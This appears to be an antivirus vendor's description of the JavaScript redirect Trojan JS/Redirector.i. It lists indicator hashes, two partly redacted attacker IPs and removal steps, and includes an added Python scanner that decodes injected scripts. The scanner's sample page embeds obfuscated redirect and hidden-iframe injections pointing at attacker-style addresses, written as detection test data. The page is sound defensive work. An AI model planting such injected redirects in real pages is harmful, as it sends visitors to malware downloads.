JS/Redirector.i

This page shows details and results of our analysis on the malware JS/Redirector.i

Overview

This is a Trojan detection. Unlike viruses, Trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include email, malicious or hacked web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

File Information:

  • MD5  - 4A398C912289F71FD193EEC389DD2C04
  • SHA1 - 905ECDDD6C621E99DE46BFACC5DB56B3ACFB6314

Aliases

  • Avast     - JS:Illredir-S
  • GData     - JS:Illredir-S
  • Kaspersky - Trojan-Downloader.JS.Pegel.l
  • NOD32     - JS/TrojanDownloader.Agent.NSF


Minimum DAT

5906 (2010-02-28)

Updated DAT

5920 (2010-03-14)

Minimum Engine

5.3.00

File Length

Varies

Description Added

2010-02-28

Description Modified

2010-03-09

Malware Proliferation

Characteristics

JS/Redirector.i is a JavaScript Trojan that is usually injected into otherwise legitimate HTML pages, typically as an obfuscated script block. It is also hosted directly on malicious web sites, where it redirects visitors to a site other than the one they expected to reach. Attackers can also deliver it in HTML-based e-mail messages that carry script.

Once the script runs, it hijacks the user's browser and redirects it to attacker-controlled web sites that download further malware and execute it.

When executed, the trojan JS/Redirector.i connects the browser to the following malicious hosts (addresses partially redacted):

  • 91.121.[Removed].139
  • 91.204.[Removed].79
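The behaviour described above (an injected, obfuscated script block that sends the browser to an attacker-controlled address, often via a character-code array, unescape() or a written-in iframe) can be checked for offline. The following scanner is an added example written for this page; it is not McAfee's detection logic and not code from the sample. It strips the two cheap encodings these injections usually rely on, extracts every redirect destination, and flags destinations that match the indicators published above, treating the redacted octet as a wildcard. The sample HTML page, the paths (in.php, x.php) and the in-filled octets (10, 20) are constructed for the example; the same indicator check is what you would run over proxy-log destination hosts when looking for the "unexpected network connections" symptom.

```python
"""Scan HTML for injected JavaScript redirectors (added example, not vendor code)."""
import re

# Indicators from the description; the third octet is redacted on the page,
# so it is matched as a wildcard here (assumption for the example).
INDICATOR_PATTERNS = [
    re.compile(r"^91\.121\.\d{1,3}\.139$"),
    re.compile(r"^91\.204\.\d{1,3}\.79$"),
]

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
# Three ways a script can move the browser: assign location, call
# location.replace/assign, or write an <iframe> into the document.
REDIRECT_RE = re.compile(
    r"(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*=\s*(['\"])(.*?)\1"
    r"|location\.(?:replace|assign)\(\s*(['\"])(.*?)\3\s*\)"
    r"|<iframe\b[^>]*\bsrc\s*=\s*(['\"])(.*?)\5",
    re.I | re.S,
)
HOST_RE = re.compile(r"^(?:https?:)?//([^/:?#]+)", re.I)
BARE_IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def _js_unescape(s: str) -> str:
    """Decode %uXXXX and %XX sequences the way JavaScript's unescape() does."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def deobfuscate(js: str, max_rounds: int = 5) -> str:
    """Replace String.fromCharCode(...) and unescape('...') calls with their
    decoded text, repeating because the layers are often nested."""
    for _ in range(max_rounds):
        before = js
        js = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(c)) for c in m.group(1).replace(" ", "").split(",") if c),
            js,
        )
        js = UNESCAPE_RE.sub(lambda m: _js_unescape(m.group(2)), js)
        if js == before:
            break
    return js


def extract_redirect_targets(html_text: str) -> list:
    """Return every URL the page tries to send the browser to, in order found."""
    sources = [html_text] + [deobfuscate(s) for s in SCRIPT_RE.findall(html_text)]
    targets = []
    for src in sources:
        for m in REDIRECT_RE.finditer(src):
            url = m.group(2) or m.group(4) or m.group(6)
            if url and url not in targets:
                targets.append(url)
    return targets


def classify(url: str) -> str:
    """'known-indicator' for the hosts listed on this page, 'bare-ip' for any
    other numeric host (worth a second look), 'other' for everything else."""
    m = HOST_RE.match(url)
    host = m.group(1) if m else ""
    if any(p.match(host) for p in INDICATOR_PATTERNS):
        return "known-indicator"
    if BARE_IP_RE.match(host):
        return "bare-ip"
    return "other"


def scan_html(html_text: str) -> list:
    """Pair each redirect destination with its classification."""
    return [(url, classify(url)) for url in extract_redirect_targets(html_text)]


# Constructed sample page: one legitimate iframe plus two injected script
# blocks, encoded the way the description says this family hides itself.
_INJECTED_JS = 'document.location="http://91.121.10.139/in.php";'
_CODES = ",".join(str(ord(c)) for c in _INJECTED_JS)
SAMPLE_PAGE = f"""<html><head><title>Welcome</title></head><body>
<p>Our company page.</p>
<iframe src="https://www.example.com/embed"></iframe>
<script>
eval(String.fromCharCode({_CODES}));
</script>
<script>
document.write(unescape('%3Ciframe src=%22http://91.204.20.79/x.php%22 width=1 height=1%3E%3C/iframe%3E'));
</script>
</body></html>"""

if __name__ == "__main__":
    for url, verdict in scan_html(SAMPLE_PAGE):
        print(f"{verdict:16} {url}")
```

The scanner deliberately does not execute the script: the two decoders cover the encodings this family is described with, and a page whose redirect survives them untouched is itself a finding. Legitimate iframes and redirects land in the "other" bucket, so the output is a short list to triage rather than a verdict on the whole page.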

Symptoms

  • Redirection to web sites other than the one requested.
  • Unexpected network connections to the IP addresses listed above.

Method of Infection

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, news group postings, e-mail, etc.

Removal

All Users:

Please use the following instructions for all supported versions of Windows to remove threats and other potential risks:

1. Disable System Restore.

2. Update to the current engine and DAT files for detection and removal.

3. Run a complete system scan.

Modifications made to the system Registry and/or INI files for the purpose of hooking system startup will be removed successfully when cleaning with the recommended engine and DAT combination (or higher).

4. Use the Microsoft Recovery Console to restore a clean MBR.

On Windows XP:

1. Insert the Windows XP CD into the CD-ROM drive and restart the computer.
2. When the "Welcome to Setup" screen appears, press R to start the Recovery Console.
3. Select the Windows installation that is compromised and provide the administrator password.
4. Run the 'fixmbr' command to restore the Master Boot Record.
5. Follow the on-screen instructions.
6. Restart the computer and remove the CD from the CD-ROM drive.


On Windows Vista and 7:

1. Insert the Windows CD into the CD-ROM drive and restart the computer.
2. Click "Repair Your Computer".
3. When the System Recovery Options dialog appears, choose Command Prompt.
4. Run the 'bootrec /fixmbr' command to restore the Master Boot Record.
5. Follow the on-screen instructions.
6. Restart the computer and remove the CD from the CD-ROM drive.

Variants